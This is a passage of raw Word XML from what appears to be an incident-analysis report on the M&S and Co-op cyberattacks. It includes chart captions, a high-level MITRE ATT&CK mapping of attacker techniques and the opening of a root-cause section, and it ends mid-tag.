    <w:p w14:paraId="6C75A68A" w14:textId="523646F3" w:rsidR="006F1DE6" w:rsidRDefault="006F1DE6" w:rsidP="00EB08C5">
      <w:r w:rsidRPr="006F1DE6">
        <w:t>The line graph shows revenue trends over months</w:t>
      </w:r>
      <w:r>
        <w:t>, with a red vertical line marking the cyberattack</w:t>
      </w:r>
      <w:r w:rsidRPr="006F1DE6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652EC24C" w14:textId="77777777" w:rsidR="004B2D86" w:rsidRDefault="004B2D86" w:rsidP="00EB08C5"/>
    <w:p w14:paraId="41EA5CF0" w14:textId="021CEE9F" w:rsidR="004B2D86" w:rsidRDefault="007F5B69" w:rsidP="00EB08C5">
      <w:r w:rsidRPr="007F5B69">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AFB0AA7" wp14:editId="7E794555">
            <wp:extent cx="5731510" cy="3415665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="208421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21138" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3415665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FF587E" w14:textId="361C065D" w:rsidR="001C2F41" w:rsidRDefault="001C2F41" w:rsidP="00EB08C5">
      <w:r w:rsidRPr="001C2F41">
        <w:t>The stacked bar chart compares operational costs for both companies across months.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993885A" w14:textId="77777777" w:rsidR="004558A6" w:rsidRDefault="004558A6" w:rsidP="00EB08C5"/>
    <w:p w14:paraId="3771BFF6" w14:textId="0BD1C928" w:rsidR="004558A6" w:rsidRDefault="004558A6" w:rsidP="00EB08C5">
      <w:r w:rsidRPr="004558A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A1EB5E3" wp14:editId="13574534">
            <wp:extent cx="5731510" cy="3115310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="279494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494771" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3115310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32315836" w14:textId="676E85A8" w:rsidR="004F0419" w:rsidRDefault="004F0419" w:rsidP="00EB08C5">
      <w:r w:rsidRPr="004F0419">
        <w:t>The pie charts illustrate the percentage of customers affected in a specific month (May in this example).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68563668" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="21001977" w14:textId="5B42069D" w:rsidR="004970D4" w:rsidRPr="005931E7" w:rsidRDefault="00C9769F" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004970D4" w:rsidRPr="005931E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Adversary TTP mapping (MITRE ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDDB7EF" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Below are at least ten key TTPs mapped to MITRE ATT&amp;CK® Enterprise, synthesised across both incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E60D2A" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="4B93C6B8" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00C71290">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Initial Access – Valid Accounts (T1078)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3B5F1A" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="660514DA" w14:textId="52797CE2" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Attackers at M&amp;S reportedly used stolen third</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>party credentials to access internal systems, bypassing MFA controls. This aligns with T1078: use of legitimate accounts to gain access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDCD3A" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="02B728B4" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00C71290">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Initial Access – Phishing / Social Engineering (T1566.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A133F8" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="1504458D" w14:textId="2E21EAC3" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Retail ransomware campaigns frequently rely on credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>harvesting phishing; reporting around Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op and similar retail attacks highlights social engineering as a likely vector, even if not fully disclosed. This maps to T1566.001 (phishing for credentials).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD5130C" w14:textId="77777777" w:rsidR="00B2521F" w:rsidRDefault="00B2521F" w:rsidP="004970D4"/>
    <w:p w14:paraId="7CCE105E" w14:textId="6637FC40" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00B2521F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Initial Access – Exploit Public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>Facing Application (T1190)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0856DD37" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="54B3D116" w14:textId="77777777" w:rsidR="00745F46" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t xml:space="preserve">Extended outages and </w:t>
      </w:r>
      <w:r w:rsidR="00B2521F">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>need to rebuild online platforms at M&amp;S suggest compromise of internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">facing services or APIs, consistent with exploitation of web applications. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0920AEBE" w14:textId="77777777" w:rsidR="00745F46" w:rsidRDefault="00745F46" w:rsidP="004970D4"/>
    <w:p w14:paraId="318AE7E2" w14:textId="77777777" w:rsidR="00745F46" w:rsidRDefault="00745F46" w:rsidP="004970D4"/>
    <w:p w14:paraId="53EC3C83" w14:textId="45DC5A8F" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00745F46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Execution – Command and Scripting Interpreter (T1059)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DA415D" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="580A431B" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t xml:space="preserve">Ransomware and lateral movement typically rely on PowerShell, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, or bash scripts; industry analysis of similar campaigns by Scattered Spider and ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">service operators emphasises heavy script usage. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBD571A" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="26C33054" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00745F46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Persistence – Account Manipulation (T1098)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2921BC9E" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="0E4DB26C" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t xml:space="preserve">Use of compromised or newly created accounts to maintain access is common in such campaigns; long dwell times and extended disruption suggest persistent access at both organisations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C2957A" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="24ED44A9" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00745F46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation – Abuse of Valid Accounts / Admin Misuse (T1078, T1068)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6FCAFB" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="6D09F9E6" w14:textId="04CAD2E2" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>To deploy ransomware across core systems, attackers must escalate privileges, often via domain admin accounts or exploitation of unpatched privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>escalation vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17B4A4" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="002A2E88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lateral Movement – Remote Services (T1021) / Remote Desktop Protocol (T1021.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479E888" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="33DA8FAF" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Retail ransomware campaigns typically move laterally via RDP, SMB, and remote admin tools; the scale of disruption at M&amp;S and Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">op suggests extensive lateral movement. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C70417" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="07F4C631" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="002A2E88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Collection &amp; Exfiltration – Exfiltration to Cloud / Web Services (T1567)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5464057D" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="1C337563" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op confirmed that attackers copied data from one of its systems; reporting on Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op and similar incidents notes data exfiltration prior to encryption, consistent with double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">extortion models. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B1CCB" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="79FCA309" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00F72589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Impact – Data Encrypted for Impact (T1486)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0783E2" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="775B596D" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>M&amp;S experienced a ransomware attack that forced shutdown of online services and rebuilding of systems; Co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>op</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>s disruption and profit loss are also consistent with ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">style impact. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0682B332" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="5F213DBC" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="00F72589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Impact – Service Stop / System Shutdown (T1489, T1529)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A3475" w14:textId="77777777" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4"/>
    <w:p w14:paraId="123E758E" w14:textId="4ECB3A34" w:rsidR="004970D4" w:rsidRDefault="004970D4" w:rsidP="004970D4">
      <w:r>
        <w:t>Both organisations proactively shut down systems to contain the attack, and attackers likely stopped services as part of encryption and disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687EFF52" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E73854" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5122F1" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02723F26" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7364C806" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3629B8F9" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABC688F" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2874B15F" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707BDCA5" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742C17EF" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239A660F" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35655B00" w14:textId="77777777" w:rsidR="00E07BB3" w:rsidRDefault="00E07BB3" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041B53DD" w14:textId="754A106F" w:rsidR="00CF4CA5" w:rsidRDefault="004B7197" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B7197">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The Attack Chain Diagram </w:t>
      </w:r>
      <w:r w:rsidR="00AB480E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB480E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attack_flow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB480E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB480E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EEA1485" w14:textId="3F1F6EDB" w:rsidR="00F66E04" w:rsidRDefault="0051481A" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051481A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33ECA692" wp14:editId="2DE0AA0B">
            <wp:extent cx="6000750" cy="6292850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31417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174204" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:duotone>
                        <a:schemeClr val="accent4">
                          <a:shade val="45000"/>
                          <a:satMod val="135000"/>
                        </a:schemeClr>
                        <a:prstClr val="white"/>
                      </a:duotone>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6001282" cy="6293408"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27550132" w14:textId="0E322E3D" w:rsidR="00F53546" w:rsidRPr="004B7197" w:rsidRDefault="00F53546" w:rsidP="004970D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using visual code to create this diagram </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED1136" w14:textId="77777777" w:rsidR="00B34226" w:rsidRDefault="00B34226" w:rsidP="004970D4"/>
    <w:p w14:paraId="465085E4" w14:textId="77777777" w:rsidR="000D3669" w:rsidRDefault="000D3669" w:rsidP="004970D4"/>
    <w:p w14:paraId="1DF7C621" w14:textId="77777777" w:rsidR="00FE5704" w:rsidRDefault="004970D4" w:rsidP="00FE5704">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D3669">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root cause and security control fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3410D8" w14:textId="1E1E450A" w:rsidR="00C17ABC" w:rsidRPr="00FE5704" w:rsidRDefault="00C17ABC" w:rsidP="00FE5704">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D29E2" w:rsidRPr="003F20D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Cyberattacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17ABC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> on M&amp;S and Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17ABC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>op were not the result of a single point of failure but rather a convergence of technical weaknesses, organisational shortcomings, and human</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17ABC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>factor vulnerabilities. Together, these failures created an environment where threat actors—using well</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17ABC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>known MITRE ATT&amp;CK techniques—could gain initial access, escalate privileges, move laterally, and ultimately disrupt critical retail operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17ABC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C2F79" w14:textId="77777777" w:rsidR="007D29E2" w:rsidRDefault="00C17ABC" w:rsidP="00C17ABC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
